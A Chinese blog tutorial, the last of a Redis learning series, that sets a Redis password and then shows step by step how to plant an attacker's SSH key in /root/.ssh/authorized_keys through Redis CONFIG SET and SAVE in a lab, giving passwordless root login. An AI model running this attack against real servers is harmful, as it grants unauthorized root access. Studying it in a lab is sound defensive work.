redis学习终章
2023-6-5 22:13:46 Author: 白安全组(查看原文) 阅读量:19 收藏

当然这不是redis的终章,只是咱们这redis学习小系列的终章,大家可以将三篇文章连起来阅读理解会更好。

这里我们需要模拟有密码的环境,所以我们设置一下密码

我们需要设置密码的话,需要到之前的配置文件中去

目录

/etc/redis/redis-conf

在配置文件最后一行

添加

requirepass 【密码】

vim中输入G到最后一行

gg到文章开头

然后重启redis服务器

可以直接使用

redis-cli shutdown

命令关闭再启动

或者先登录上然后执行shutdown命令再启动

启动之后登录就需要输入密码

redis-cli -h 目标IP -a 密码

最后我们模拟免密登录漏洞的操作

前言:

这个漏洞的过程就是,获取到对方redis的登陆密码,我们可以登录了,然后在我们攻击机器上生成一个ssh的密钥,然后将我们的密钥传到对方的.ssh这个隐藏目录下,然后通过这个密钥进行无密码登录

首先我们打开kali进行一个ssh的密钥拷贝

ssh-keygen -t rsa

这里我们生成一个密钥保存到root目录下一个隐藏的.ssh文件夹中

我们上面路径默认,然后选择y,然后密码都为空直接回车就可以了

然后我们通过

ls -la

命令查看root下的.ssh文件夹

然后我们查看下面的id_rsa文件

密钥保存在下面这里

然后我们需要通过修改这个格式并将其保存到一个txt中

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt

然后我们就可以利用我们已经登录或者已经知道密码的redis进行设置

首先就是将key.txt赋值给xxx

cat key.txt | redis-cli -h 192.168.119.150 -a 115277 -x set xxx

然后我们登录进去

这里我们get xxx就可以看到我们的key值了,证明我们插入成功了

设置一个路径

config set dir /root/.ssh

这里前提是对方主机中root下有.ssh文件夹

然后设置一个dir路径,设置db的filename

CONFIG SET dbfilename authorized_keys

然后保存

save

到这里我们的配置就完成了,我们可以直接利用密钥进行无密码链接了

ssh -i id_rsa root@192.168.119.150

当然这个是在攻击机器中的.ssh文件夹中,利用id_rsa进行连接

然后我们直接yes就可以连接成功了

成功进行无密码登录。

科学上网点这里

工具集合点这里

实战文章点这里

QQ查I P点这里

扫描二维码关注我们吧!


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486570&idx=1&sn=fb2a9285e2109250552c8602ab0fa7b4&chksm=fdb4db31cac352270a3c5c000c53fc47bca7eddf01c803fcf433d1ef5e44db4523a4baa31343#rd
如有侵权请联系:admin#unsafe.sh